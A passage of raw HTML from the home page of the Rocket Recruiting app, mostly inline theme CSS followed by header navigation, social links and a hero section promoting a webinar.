.w-progbar-bar:before,.w-progbar.style_3 .w-progbar-bar-count,.w-tabs.layout_default .w-tabs-list,.w-tabs.layout_ver .w-tabs-list,.w-testimonial.style_4:before,.no-touch .l-main .widget_nav_menu a:hover,.l-content .wp-caption-text,#lang_sel a,#lang_sel_click a,.smile-icon-timeline-wrap .timeline-wrapper .timeline-block,.smile-icon-timeline-wrap .timeline-feature-item.feat-item,.woocommerce .quantity .plus,.woocommerce .quantity .minus,.select2-container a.select2-choice,.select2-drop .select2-search input,.woocommerce-tabs .tabs,.woocommerce #payment .payment_box,.woocommerce ul.order_details,#subscription-toggle,#favorite-toggle,#bbp-user-navigation,.tablepress .row-hover tr:hover td,.tribe-bar-views-list,.tribe-events-day-time-slot h5,.tribe-events-present,.tribe-events-single-section,.gform_wrapper .chosen-container-single .chosen-single,.gform_wrapper .chosen-container .chosen-drop,.gform_wrapper .chosen-container-multi .chosen-choices {background-color:#f2f2f2;}.timeline-wrapper .timeline-post-right .ult-timeline-arrow l,.timeline-wrapper .timeline-post-left .ult-timeline-arrow l,.timeline-feature-item.feat-item .ult-timeline-arrow l,.woocommerce #payment .payment_box:after {border-color:#f2f2f2;}hr,td,th,.l-section,.g-cols > div,.w-author,.w-comments-list,.w-pricing-item-h,.w-profile,.w-separator,.w-sharing-item,.w-tabs-list,.w-tabs-section,.w-tabs-section-header:before,.w-tabs.layout_timeline.accordion .w-tabs-section-content,.g-tags > a,.w-testimonial.style_1,.widget_calendar #calendar_wrap,.l-main .widget_nav_menu > div,.l-main .widget_nav_menu .menu-item a,.widget_nav_menu .menu-item.menu-item-has-children + .menu-item > a,.select2-container a.select2-choice,.smile-icon-timeline-wrap .timeline-line,.woocommerce .login,.woocommerce .checkout_coupon,.woocommerce .register,.woocommerce .cart.variations_form,.woocommerce .commentlist .comment-text,.woocommerce .comment-respond,.woocommerce .related,.woocommerce .upsells,.woocommerce .cross-sells,.woocommerce .checkout #order_review,.widget_price_filter .ui-slider-handle,.widget_layered_nav ul,.widget_layered_nav ul li,#bbpress-forums fieldset,.bbp-login-form fieldset,#bbpress-forums .bbp-body > ul,#bbpress-forums li.bbp-header,.bbp-replies .bbp-body,div.bbp-forum-header,div.bbp-topic-header,div.bbp-reply-header,.bbp-pagination-links a,.bbp-pagination-links span.current,span.bbp-topic-pagination a.page-numbers,.bbp-logged-in,.tribe-events-list-separator-month span:before,.tribe-events-list-separator-month span:after,.type-tribe_events + .type-tribe_events,.gform_wrapper .gsection,.gform_wrapper .gf_page_steps,.gform_wrapper li.gfield_creditcard_warning,.form_saved_message {border-color:#e5e5e5;}.w-separator,.w-iconbox.color_light .w-iconbox-icon,.w-testimonial.style_3 .w-testimonial-text:after,.w-testimonial.style_3 .w-testimonial-text:before {color:#e5e5e5;}a.w-btn.color_light,.w-btn.color_light,.w-btn.color_light.style_outlined:before,.w-btn.w-blog-post-more:before,.w-iconbox.style_circle.color_light .w-iconbox-icon,.no-touch .g-loadmore-btn:hover,.woocommerce .button,.no-touch .woocommerce .quantity .plus:hover,.no-touch .woocommerce .quantity .minus:hover,.widget_price_filter .ui-slider,#tribe-bar-collapse-toggle,.gform_wrapper .gform_page_footer .gform_previous_button {background-color:#e5e5e5;}a.w-btn.color_light.style_outlined,.w-btn.color_light.style_outlined,.w-btn.w-blog-post-more,.w-iconbox.style_outlined.color_light .w-iconbox-icon,.w-person-links-item,.w-socials-item-link,.pagination .page-numbers {box-shadow:0 0 0 2px #e5e5e5 inset;}.w-tabs.layout_trendy .w-tabs-list {box-shadow:0 -1px 0 #e5e5e5 inset;}h1, h2, h3, h4, h5, h6,.w-counter-number,.w-pricing-item-header,.w-progbar.color_custom .w-progbar-title,.woocommerce .products .product .price,.gform_wrapper .chosen-container-single .chosen-single {color:#ff0000;}.w-progbar.color_contrast .w-progbar-bar-h {background-color:#ff0000;}input,textarea,select,.l-canvas,a.w-btn.color_contrast.style_outlined,.w-btn.color_contrast.style_outlined,.w-cart-dropdown,.w-form-row-field:before,.w-iconbox.color_contrast .w-iconbox-icon,.w-iconbox.color_light.style_circle .w-iconbox-icon,.w-tabs.layout_timeline .w-tabs-item,.w-tabs.layout_timeline .w-tabs-section-header-h,.woocommerce .button {color:#000000;}a.w-btn.color_light,.w-btn.color_light,.w-btn.w-blog-post-more {color:#000000 !important;}a.w-btn.color_contrast,.w-btn.color_contrast,.w-btn.color_contrast.style_outlined:before,.w-iconbox.style_circle.color_contrast .w-iconbox-icon,.tribe-mobile #tribe-events-footer a,.tribe-events-calendar thead th {background-color:#000000;}.tribe-events-calendar thead th {border-color:#000000;}a.w-btn.color_contrast.style_outlined,.w-btn.color_contrast.style_outlined,.w-iconbox.style_outlined.color_contrast .w-iconbox-icon {box-shadow:0 0 0 2px #000000 inset;}a {color:#ff0000;}.no-touch a:hover,.no-touch a:hover + .w-blog-post-body .w-blog-post-title a,.no-touch .w-blog-post-title a:hover {color:#000000;}.no-touch .w-cart-dropdown a:not(.button):hover {color:#000000 !important;}.highlight_primary,.l-preloader,.no-touch .l-titlebar .g-nav-item:hover,a.w-btn.color_primary.style_outlined,.w-btn.color_primary.style_outlined,.l-main .w-contacts-item:before,.w-counter.color_primary .w-counter-number,.g-filters-item.active,.no-touch .g-filters.style_1 .g-filters-item.active:hover,.no-touch .g-filters.style_2 .g-filters-item.active:hover,.w-form-row.focused .w-form-row-field:before,.w-iconbox.color_primary .w-iconbox-icon,.no-touch .w-iconbox-link:hover .w-iconbox-title,.no-touch .w-logos .owl-prev:hover,.no-touch .w-logos .owl-next:hover,.w-separator.color_primary,.w-sharing.type_outlined.color_primary .w-sharing-item,.no-touch .w-sharing.type_simple.color_primary .w-sharing-item:hover .w-sharing-icon,.w-tabs.layout_default .w-tabs-item.active,.w-tabs.layout_trendy .w-tabs-item.active,.w-tabs.layout_ver .w-tabs-item.active,.w-tabs-section.active .w-tabs-section-header,.no-touch .g-tags > a:hover,.w-testimonial.style_2:before,.woocommerce .products .product .button,.woocommerce .star-rating span:before,.woocommerce-tabs .tabs li.active,.no-touch .woocommerce-tabs .tabs li.active:hover,.woocommerce .stars span a:after,#subscription-toggle span.is-subscribed:before,#favorite-toggle span.is-favorite:before {color:#ff0000;}.l-section.color_primary,.l-titlebar.color_primary,.no-touch .l-navigation-item:hover .l-navigation-item-arrow,.highlight_primary_bg,.w-actionbox.color_primary,.w-blog-post-preview-icon,.w-blog.layout_cards .format-quote .w-blog-post-h,button,input[type="submit"],a.w-btn.color_primary,.w-btn.color_primary,.w-btn.color_primary.style_outlined:before,.no-touch .g-filters-item:hover,.w-iconbox.style_circle.color_primary .w-iconbox-icon,.no-touch .w-iconbox.style_circle .w-iconbox-icon:before,.no-touch .w-iconbox.style_outlined .w-iconbox-icon:before,.no-touch .w-person-links,.w-pricing-item.type_featured .w-pricing-item-header,.w-progbar.color_primary .w-progbar-bar-h,.w-sharing.type_solid.color_primary .w-sharing-item,.w-sharing.type_fixed.color_primary .w-sharing-item,.w-sharing.type_outlined.color_primary .w-sharing-item:before,.w-tabs.layout_modern .w-tabs-list,.w-tabs.layout_trendy .w-tabs-item:after,.w-tabs.layout_timeline .w-tabs-item:before,.w-tabs.layout_timeline .w-tabs-section-header-h:before,.no-touch .w-header-show:hover,.no-touch .w-toplink.active:hover,.no-touch .pagination .page-numbers:before,.pagination .page-numbers.current,.l-main .widget_nav_menu .menu-item.current-menu-item > a,.rsDefault .rsThumb.rsNavSelected,.no-touch .tp-leftarrow.tparrows.custom:before,.no-touch .tp-rightarrow.tparrows.custom:before,.smile-icon-timeline-wrap .timeline-separator-text .sep-text,.smile-icon-timeline-wrap .timeline-wrapper .timeline-dot,.smile-icon-timeline-wrap .timeline-feature-item .timeline-dot,.tablepress .sorting:hover,.tablepress .sorting_asc,.tablepress .sorting_desc,p.demo_store,.woocommerce .button.alt,.woocommerce .button.checkout,.woocommerce .products .product .button.loading,.no-touch .woocommerce .products .product .button:hover,.woocommerce .onsale,.widget_price_filter .ui-slider-range,.widget_layered_nav ul li.chosen,.widget_layered_nav_filters ul li a,.no-touch .bbp-pagination-links a:hover,.bbp-pagination-links span.current,.no-touch span.bbp-topic-pagination a.page-numbers:hover,.tribe-events-calendar td.mobile-active,.tribe-events-button,.datepicker td.day.active,.datepicker td span.active,.gform_wrapper .gform_page_footer .gform_next_button,.gform_wrapper .gf_progressbar_percentage,.gform_wrapper .chosen-container .chosen-results li.highlighted {background-color:#ff0000;}.l-content blockquote,.no-touch .l-titlebar .g-nav-item:hover,.g-filters.style_3 .g-filters-item.active,.no-touch .w-logos .owl-prev:hover,.no-touch .w-logos .owl-next:hover,.no-touch .w-logos.style_1 .w-logos-item:hover,.w-separator.color_primary,.w-tabs.layout_default .w-tabs-item.active,.w-tabs.layout_ver .w-tabs-item.active,.no-touch .g-tags > a:hover,.no-touch .w-testimonial.style_1:hover,.l-main .widget_nav_menu .menu-item.current-menu-item > a,.woocommerce-tabs .tabs li.active,.no-touch .woocommerce-tabs .tabs li.active:hover,.widget_layered_nav ul li.chosen,.bbp-pagination-links span.current,.no-touch #bbpress-forums .bbp-pagination-links a:hover,.no-touch #bbpress-forums .bbp-topic-pagination a:hover,#bbp-user-navigation li.current {border-color:#ff0000;}a.w-btn.color_primary.style_outlined,.w-btn.color_primary.style_outlined,.l-main .w-contacts-item:before,.w-iconbox.color_primary.style_outlined .w-iconbox-icon,.w-sharing.type_outlined.color_primary .w-sharing-item,.w-tabs.layout_timeline .w-tabs-item,.w-tabs.layout_timeline .w-tabs-section-header-h,.woocommerce .products .product .button {box-shadow:0 0 0 2px #ff0000 inset;}input:focus,textarea:focus,select:focus {box-shadow:0 0 0 2px #ff0000;}.highlight_secondary,.no-touch .w-blognav-prev:hover .w-blognav-title,.no-touch .w-blognav-next:hover .w-blognav-title,a.w-btn.color_secondary.style_outlined,.w-btn.color_secondary.style_outlined,.w-counter.color_secondary .w-counter-number,.w-iconbox.color_secondary .w-iconbox-icon,.w-separator.color_secondary,.w-sharing.type_outlined.color_secondary .w-sharing-item,.no-touch .w-sharing.type_simple.color_secondary .w-sharing-item:hover .w-sharing-icon {color:#000000;}.l-section.color_secondary,.l-titlebar.color_secondary,.highlight_secondary_bg,.no-touch .w-blog.layout_cards .w-blog-post-meta-category a:hover,.no-touch .w-blog.layout_tiles .w-blog-post-meta-category a:hover,.no-touch .l-section.preview_trendy .w-blog-post-meta-category a:hover,.no-touch input[type="submit"]:hover,a.w-btn.color_secondary,.w-btn.color_secondary,.w-btn.color_secondary.style_outlined:before,.w-actionbox.color_secondary,.w-iconbox.style_circle.color_secondary .w-iconbox-icon,.w-progbar.color_secondary .w-progbar-bar-h,.w-sharing.type_solid.color_secondary .w-sharing-item,.w-sharing.type_fixed.color_secondary .w-sharing-item,.w-sharing.type_outlined.color_secondary .w-sharing-item:before,.no-touch .woocommerce input[type="submit"]:hover,.no-touch .woocommerce .button:not([disabled]):hover,.no-touch .woocommerce .product-remove a.remove:hover,.no-touch .tribe-events-button:hover,.no-touch .widget_layered_nav_filters ul li a:hover {background-color:#000000;}.w-separator.color_secondary {border-color:#000000;}a.w-btn.color_secondary.style_outlined,.w-btn.color_secondary.style_outlined,.w-iconbox.color_secondary.style_outlined .w-iconbox-icon,.w-sharing.type_outlined.color_secondary .w-sharing-item {box-shadow:0 0 0 2px #000000 inset;}.highlight_faded,.w-author-url,.w-blog-post-meta > *,.w-profile-link.for_logout,.w-testimonial-person-meta,.w-testimonial.style_4:before,.l-main .widget_tag_cloud,.l-main .widget_product_tag_cloud,.woocommerce-breadcrumb,.woocommerce .star-rating:before,.woocommerce .stars span:after,p.bbp-topic-meta,.bbp_widget_login .logout-link {color:#999999;}.w-blog.layout_latest .w-blog-post-meta-date {border-color:#999999;}.tribe-events-cost,.tribe-events-list .tribe-events-event-cost {background-color:#999999;}.l-section.color_alternate,.l-titlebar.color_alternate,.color_alternate .g-filters.style_1 .g-filters-item.active,.no-touch .color_alternate .g-filters-item.active:hover,.color_alternate .w-tabs.layout_default .w-tabs-item.active,.no-touch .color_alternate .w-tabs.layout_default .w-tabs-item.active:hover,.color_alternate .w-tabs.layout_ver .w-tabs-item.active,.no-touch .color_alternate .w-tabs.layout_ver .w-tabs-item.active:hover,.color_alternate .w-tabs.layout_timeline .w-tabs-item,.color_alternate .w-tabs.layout_timeline .w-tabs-section-header-h {background-color:#f2f2f2;}.color_alternate a.w-btn.color_contrast,.color_alternate .w-btn.color_contrast,.no-touch .color_alternate a.w-btn.color_contrast:hover,.no-touch .color_alternate .w-btn.color_contrast:hover,.no-touch .color_alternate a.w-btn.color_contrast.style_outlined:hover,.no-touch .color_alternate .w-btn.color_contrast.style_outlined:hover,.color_alternate .w-iconbox.style_circle.color_contrast .w-iconbox-icon {color:#f2f2f2;}.color_alternate .w-tabs.layout_modern .w-tabs-item:after {border-bottom-color:#f2f2f2;}.color_alternate input,.color_alternate textarea,.color_alternate select,.color_alternate .w-blog-post-preview-icon,.color_alternate .w-blog.layout_masonry .w-blog-post-h,.color_alternate .w-blog.layout_cards .w-blog-post-h,.color_alternate .g-filters.style_1,.color_alternate .g-filters.style_2 .g-filters-item.active,.color_alternate .w-iconbox.style_circle.color_light .w-iconbox-icon,.color_alternate .g-loadmore-btn,.color_alternate .w-pricing-item-header,.color_alternate .w-progbar-bar,.color_alternate .w-tabs.layout_default .w-tabs-list,.color_alternate .w-testimonial.style_4:before,.l-content .color_alternate .wp-caption-text {background-color:#ffffff;}.l-section.color_alternate,.l-section.color_alternate hr,.l-section.color_alternate th,.l-section.color_alternate td,.color_alternate .g-cols > div,.color_alternate .w-blog-post,.color_alternate .w-comments-list,.color_alternate .w-pricing-item-h,.color_alternate .w-profile,.color_alternate .w-separator,.color_alternate .w-tabs-list,.color_alternate .w-tabs-section,.color_alternate .w-tabs-section-header:before,.color_alternate .w-tabs.layout_timeline.accordion .w-tabs-section-content,.color_alternate .w-testimonial.style_1 {border-color:#dddddd;}.color_alternate .w-separator,.color_alternate .w-iconbox.color_light .w-iconbox-icon,.color_alternate .w-testimonial.style_3 .w-testimonial-text:after,.color_alternate .w-testimonial.style_3 .w-testimonial-text:before {color:#dddddd;}.color_alternate a.w-btn.color_light,.color_alternate .w-btn.color_light,.color_alternate .w-btn.color_light.style_outlined:before,.color_alternate .w-btn.w-blog-post-more:before,.color_alternate .w-iconbox.style_circle.color_light .w-iconbox-icon,.no-touch .color_alternate .g-loadmore-btn:hover {background-color:#dddddd;}.color_alternate a.w-btn.color_light.style_outlined,.color_alternate .w-btn.color_light.style_outlined,.color_alternate .w-btn.w-blog-post-more,.color_alternate .w-iconbox.style_outlined.color_light .w-iconbox-icon,.color_alternate .w-person-links-item,.color_alternate .w-socials-item-link,.color_alternate .pagination .page-numbers {box-shadow:0 0 0 2px #dddddd inset;}.color_alternate .w-tabs.layout_trendy .w-tabs-list {box-shadow:0 -1px 0 #dddddd inset;}.color_alternate h1,.color_alternate h2,.color_alternate h3,.color_alternate h4,.color_alternate h5,.color_alternate h6,.color_alternate .w-counter-number,.color_alternate .w-pricing-item-header {color:#000000;}.color_alternate .w-progbar.color_contrast .w-progbar-bar-h {background-color:#000000;}.l-titlebar.color_alternate,.l-section.color_alternate,.color_alternate input,.color_alternate textarea,.color_alternate select,.color_alternate a.w-btn.color_contrast.style_outlined,.color_alternate .w-btn.color_contrast.style_outlined,.color_alternate .w-form-row-field:before,.color_alternate .w-iconbox.color_contrast .w-iconbox-icon,.color_alternate .w-iconbox.color_light.style_circle .w-iconbox-icon,.color_alternate .w-tabs.layout_timeline .w-tabs-item,.color_alternate .w-tabs.layout_timeline .w-tabs-section-header-h {color:#444444;}.color_alternate a.w-btn.color_light,.color_alternate .w-btn.color_light,.color_alternate .w-btn.w-blog-post-more {color:#444444 !important;}.color_alternate a.w-btn.color_contrast,.color_alternate .w-btn.color_contrast,.color_alternate .w-btn.color_contrast.style_outlined:before,.color_alternate .w-iconbox.style_circle.color_contrast .w-iconbox-icon {background-color:#444444;}.color_alternate a.w-btn.color_contrast.style_outlined,.color_alternate .w-btn.color_contrast.style_outlined,.color_alternate .w-iconbox.style_outlined.color_contrast .w-iconbox-icon {box-shadow:0 0 0 2px #444444 inset;}.color_alternate a {color:#000000;}.no-touch .color_alternate a:hover,.no-touch .color_alternate a:hover + .w-blog-post-body .w-blog-post-title a,.no-touch .color_alternate .w-blog-post-title a:hover {color:#444444;}.color_alternate .highlight_primary,.no-touch .l-titlebar.color_alternate .g-nav-item:hover,.color_alternate a.w-btn.color_primary.style_outlined,.color_alternate .w-btn.color_primary.style_outlined,.l-main .color_alternate .w-contacts-item:before,.color_alternate .w-counter.color_primary .w-counter-number,.color_alternate .g-filters-item.active,.no-touch .color_alternate .g-filters-item.active:hover,.color_alternate .w-form-row.focused .w-form-row-field:before,.color_alternate .w-iconbox.color_primary .w-iconbox-icon,.no-touch .color_alternate .w-iconbox-link:hover .w-iconbox-title,.no-touch .color_alternate .w-logos .owl-prev:hover,.no-touch .color_alternate .w-logos .owl-next:hover,.color_alternate .w-separator.color_primary,.color_alternate .w-tabs.layout_default .w-tabs-item.active,.color_alternate .w-tabs.layout_trendy .w-tabs-item.active,.color_alternate .w-tabs.layout_ver .w-tabs-item.active,.color_alternate .w-tabs-section.active .w-tabs-section-header,.color_alternate .w-testimonial.style_2:before {color:#000000;}.color_alternate .highlight_primary_bg,.color_alternate .w-actionbox.color_primary,.color_alternate .w-blog-post-preview-icon,.color_alternate .w-blog.layout_cards .format-quote .w-blog-post-h,.color_alternate button,.color_alternate input[type="submit"],.color_alternate a.w-btn.color_primary,.color_alternate .w-btn.color_primary,.color_alternate .w-btn.color_primary.style_outlined:before,.no-touch .color_alternate .g-filters-item:hover,.color_alternate .w-iconbox.style_circle.color_primary .w-iconbox-icon,.no-touch .color_alternate .w-iconbox.style_circle .w-iconbox-icon:before,.no-touch .color_alternate .w-iconbox.style_outlined .w-iconbox-icon:before,.no-touch .color_alternate .w-person-links,.color_alternate .w-pricing-item.type_featured .w-pricing-item-header,.color_alternate .w-progbar.color_primary .w-progbar-bar-h,.color_alternate .w-tabs.layout_modern .w-tabs-list,.color_alternate .w-tabs.layout_trendy .w-tabs-item:after,.color_alternate .w-tabs.layout_timeline .w-tabs-item:before,.color_alternate .w-tabs.layout_timeline .w-tabs-section-header-h:before,.no-touch .color_alternate .pagination .page-numbers:before,.color_alternate .pagination .page-numbers.current {background-color:#000000;}.l-content .color_alternate blockquote,.no-touch .l-titlebar.color_alternate .g-nav-item:hover,.color_alternate .g-filters.style_3 .g-filters-item.active,.no-touch .color_alternate .w-logos .owl-prev:hover,.no-touch .color_alternate .w-logos .owl-next:hover,.no-touch .color_alternate .w-logos.style_1 .w-logos-item:hover,.color_alternate .w-separator.color_primary,.color_alternate .w-tabs.layout_default .w-tabs-item.active,.color_alternate .w-tabs.layout_ver .w-tabs-item.active,.no-touch .color_alternate .w-tabs.layout_default .w-tabs-item.active:hover,.no-touch .color_alternate .w-tabs.layout_ver .w-tabs-item.active:hover,.no-touch .color_alternate .g-tags > a:hover,.no-touch .color_alternate .w-testimonial.style_1:hover {border-color:#000000;}.color_alternate a.w-btn.color_primary.style_outlined,.color_alternate .w-btn.color_primary.style_outlined,.l-main .color_alternate .w-contacts-item:before,.color_alternate .w-iconbox.color_primary.style_outlined .w-iconbox-icon,.color_alternate .w-tabs.layout_timeline .w-tabs-item,.color_alternate .w-tabs.layout_timeline .w-tabs-section-header-h {box-shadow:0 0 0 2px #000000 inset;}.color_alternate input:focus,.color_alternate textarea:focus,.color_alternate select:focus {box-shadow:0 0 0 2px #000000;}.color_alternate .highlight_secondary,.color_alternate a.w-btn.color_secondary.style_outlined,.color_alternate .w-btn.color_secondary.style_outlined,.color_alternate .w-counter.color_secondary .w-counter-number,.color_alternate .w-iconbox.color_secondary .w-iconbox-icon,.color_alternate .w-separator.color_secondary {color:#444444;}.color_alternate .highlight_secondary_bg,.no-touch .color_alternate input[type="submit"]:hover,.color_alternate a.w-btn.color_secondary,.color_alternate .w-btn.color_secondary,.color_alternate .w-btn.color_secondary.style_outlined:before,.color_alternate .w-actionbox.color_secondary,.color_alternate .w-iconbox.style_circle.color_secondary .w-iconbox-icon,.color_alternate .w-progbar.color_secondary .w-progbar-bar-h {background-color:#444444;}.color_alternate .w-separator.color_secondary {border-color:#444444;}.color_alternate a.w-btn.color_secondary.style_outlined,.color_alternate .w-btn.color_secondary.style_outlined,.color_alternate .w-iconbox.color_secondary.style_outlined .w-iconbox-icon {box-shadow:0 0 0 2px #444444 inset;}.color_alternate .highlight_faded,.color_alternate .w-blog-post-meta > *,.color_alternate .w-profile-link.for_logout,.color_alternate .w-testimonial-person-meta,.color_alternate .w-testimonial.style_4:before {color:#999999;}.color_alternate .w-blog.layout_latest .w-blog-post-meta-date {border-color:#999999;}.l-subfooter.at_top,.no-touch .l-subfooter.at_top #lang_sel ul ul a:hover,.no-touch .l-subfooter.at_top #lang_sel_click ul ul a:hover {background-color:#000000;}.l-subfooter.at_top input,.l-subfooter.at_top textarea,.l-subfooter.at_top select,.no-touch .l-subfooter.at_top #lang_sel a,.no-touch .l-subfooter.at_top #lang_sel_click a {background-color:#1c1c1c;}.l-subfooter.at_top,.l-subfooter.at_top .w-profile,.l-subfooter.at_top .widget_calendar #calendar_wrap {border-color:#333333;}.l-subfooter.at_top .w-socials-item-link {box-shadow:0 0 0 2px #333333 inset;}.l-subfooter.at_top h1,.l-subfooter.at_top h2,.l-subfooter.at_top h3,.l-subfooter.at_top h4,.l-subfooter.at_top h5,.l-subfooter.at_top h6,.l-subfooter.at_top input,.l-subfooter.at_top textarea,.l-subfooter.at_top select,.l-subfooter.at_top .w-form-row-field:before {color:#cccccc;}.l-subfooter.at_top {color:#666666;}.l-subfooter.at_top a,.l-subfooter.at_top .widget_tag_cloud .tagcloud a,.l-subfooter.at_top .widget_product_tag_cloud .tagcloud a {color:#cccccc;}.no-touch .l-subfooter.at_top a:hover,.no-touch .l-subfooter.at_top .w-form-row.focused .w-form-row-field:before,.no-touch .l-subfooter.at_top .widget_tag_cloud .tagcloud a:hover,.no-touch .l-subfooter.at_top .widget_product_tag_cloud .tagcloud a:hover {color:#ffffff;}.l-subfooter.at_top input:focus,.l-subfooter.at_top textarea:focus,.l-subfooter.at_top select:focus {box-shadow:0 0 0 2px #ffffff;}.l-subfooter.at_bottom {background-color:#000000;}.l-subfooter.at_bottom {color:#ffffff;}.l-subfooter.at_bottom a {color:#ff0000;}.no-touch .l-subfooter.at_bottom a:hover {color:#ffffff;}</style> </head> <body class="home page-template-default page page-id-8 l-body us_impreza_3-2-1 header_hor state_default wpb-js-composer js-comp-ver-4.12 vc_responsive" itemscope="itemscope" itemtype="https://schema.org/WebPage"> <div class='l-preloader'><div class='l-preloader-spinner'><div class='g-preloader type_2'><div class='g-preloader-h'><img src="http://rocketrecruitingapp.com/wp-content/uploads/2016/07/rr-loader.png" width="211" height="224" alt="" /></div></div></div></div> <!-- CANVAS --> <div class="l-canvas sidebar_none type_wide titlebar_none"> <header class="l-header pos_fixed bg_solid" itemscope="itemscope" itemtype="https://schema.org/WPHeader"><div class="l-subheader at_top"><div class="l-subheader-h"><div class="l-subheader-cell at_left"><div class="w-text ush_text_3"><div class="w-text-h"><i class="fa fa-envelope"></i><a class="w-text-value" href="mailto:[email protected]">[email protected]</a></div></div></div><div class="l-subheader-cell at_center"></div><div class="l-subheader-cell at_right"><div class="w-socials style_desaturated hover_default ush_socials_1"><div class="w-socials-list"><div class="w-socials-item facebook"> <a class="w-socials-item-link" target="_blank" href="http://www.facebook.com/erictippettsbusiness"> <span class="w-socials-item-link-hover"></span> </a> <div class="w-socials-item-popup"> <span>Facebook</span> </div> </div><div class="w-socials-item twitter"> <a class="w-socials-item-link" target="_blank" href="http://www.twitter.com/erictippetts"> <span class="w-socials-item-link-hover"></span> </a> <div class="w-socials-item-popup"> <span>Twitter</span> </div> </div><div class="w-socials-item youtube"> <a class="w-socials-item-link" target="_blank" href="http://www.youtube.com/theexpensetracker"> <span class="w-socials-item-link-hover"></span> </a> <div class="w-socials-item-popup"> <span>YouTube</span> </div> </div><div class="w-socials-item instagram"> <a class="w-socials-item-link" target="_blank" href="https://www.instagram.com/erictippetts/"> <span class="w-socials-item-link-hover"></span> </a> <div class="w-socials-item-popup"> <span>Instagram</span> </div> </div><div class="w-socials-item pinterest"> <a class="w-socials-item-link" target="_blank" href="http://pinterest.com/erictippetts"> <span class="w-socials-item-link-hover"></span> </a> <div class="w-socials-item-popup"> <span>Pinterest</span> </div> </div></div></div></div></div></div><div class="l-subheader at_middle"><div class="l-subheader-h"><div class="l-subheader-cell at_left"><div class="w-img ush_image_1"><a class="w-img-h" href="http://rocketrecruitingapp.com/"><img class="for_default" src="http://rocketrecruitingapp.com/wp-content/uploads/2016/07/Rocket-recruiting-v2-1024x235.png" width="1024" height="235" alt="Rocket recruiting v2" /></a></div></div><div class="l-subheader-cell at_center"></div><div class="l-subheader-cell at_right"><nav class="w-nav type_desktop animation_height height_full ush_menu_1" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement"><a class="w-nav-control" href="javascript:void(0);"></a><ul class="w-nav-list level_1 hover_underline hidden"><li id="menu-item-5095" class="menu-item menu-item-type-custom menu-item-object-custom current_page_item menu-item-home w-nav-item level_1 menu-item-5095"><a class="w-nav-anchor level_1" href="http://rocketrecruitingapp.com/#features"><span class="w-nav-title">FEATURES</span><span class="w-nav-arrow"></span></a></li> <li id="menu-item-5096" class="menu-item menu-item-type-custom menu-item-object-custom w-nav-item level_1 menu-item-5096"><a class="w-nav-anchor level_1" target="_blank" href="http://rocketrecruitingleads.com"><span class="w-nav-title">LEADS</span><span class="w-nav-arrow"></span></a></li> <li id="menu-item-5097" class="menu-item menu-item-type-custom menu-item-object-custom w-nav-item level_1 menu-item-5097"><a class="w-nav-anchor level_1" target="_blank" href="https://erictippetts.clickfunnels.com/auto-webinar-registration-winnertolqmv97"><span class="w-nav-title">WEBINAR</span><span class="w-nav-arrow"></span></a></li> <li id="menu-item-5100" class="menu-item menu-item-type-custom menu-item-object-custom current_page_item menu-item-home w-nav-item level_1 menu-item-5100"><a class="w-nav-anchor level_1" href="http://rocketrecruitingapp.com/#screenshots"><span class="w-nav-title">SCREENSHOTS</span><span class="w-nav-arrow"></span></a></li> <li id="menu-item-5809" class="menu-item menu-item-type-post_type menu-item-object-page w-nav-item level_1 menu-item-5809"><a class="w-nav-anchor level_1" href="http://rocketrecruitingapp.com/blog/"><span class="w-nav-title">BLOG</span><span class="w-nav-arrow"></span></a></li> <li id="menu-item-5506" class="btn menu-item menu-item-type-custom menu-item-object-custom w-nav-item level_1 menu-item-5506"><a class="w-nav-anchor level_1" href="http://app.rocketrecruitingapp.com/"><span class="w-nav-title">SIGN UP NOW</span><span class="w-nav-arrow"></span></a></li> <li id="menu-item-5420" class="btn menu-item menu-item-type-custom menu-item-object-custom w-nav-item level_1 menu-item-5420"><a class="w-nav-anchor level_1" target="_blank" href="http://taxapp.mobi"><span class="w-nav-title">LOGIN</span><span class="w-nav-arrow"></span></a></li> </ul><div class="w-nav-options hidden" onclick='return {&quot;mobileWidth&quot;:1111,&quot;mobileBehavior&quot;:1}'></div></nav></div></div></div><div class="l-subheader at_bottom"><div class="l-subheader-h"><div class="l-subheader-cell at_left"></div><div class="l-subheader-cell at_center"></div><div class="l-subheader-cell at_right"></div></div></div><div class="l-subheader for_hidden hidden"></div></header> <!-- MAIN --> <div class="l-main"> <div class="l-main-h i-cf"> <main class="l-content" itemprop="mainContentOfPage"> <section class="l-section wpb_row height_auto width_full" style="padding-top: 250px !important;padding-bottom: 250px !important;"><div class="l-section-h i-cf"><div class="g-cols offset_small"><div class="vc_col-sm-12 wpb_column"><div class="vc_column-inner"><div class="w-image align_center animate_afc"><img width="1150" height="268" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/recruit_more4.png" class="attachment-full size-full" alt="" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/recruit_more4.png 1150w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/recruit_more4-300x70.png 300w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/recruit_more4-768x179.png 768w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/recruit_more4-1024x239.png 1024w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/recruit_more4-600x140.png 600w" sizes="(max-width: 1150px) 100vw, 1150px" /></div><div class="wpb_text_column "><div class="wpb_wrapper"><img class="aligncenter size-full wp-image-5022" src="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/rr_lander_header2.png" alt="rr_lander_header2" width="1150" height="222" srcset="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/rr_lander_header2.png 1150w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/rr_lander_header2-300x58.png 300w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/rr_lander_header2-768x148.png 768w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/rr_lander_header2-1024x198.png 1024w, http://rocketrecruitingapp.com/wp-content/uploads/2013/05/rr_lander_header2-600x116.png 600w" sizes="(max-width: 1150px) 100vw, 1150px" /></div> </div> <div class="w-btn-wrapper align_center"><a class="w-btn style_solid color_primary icon_none" href="https://erictippetts.clickfunnels.com/auto-webinar-registration-winnertolqmv97" target="_blank" style="font-size: 24px;"><span class="w-btn-label">WATCH THE WEBINAR NOW</span></a></div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_bg_img" data-ultimate-bg="url(http://rocketrecruitingapp.com/wp-content/uploads/2013/05/rr-large-header-image2.jpg)" 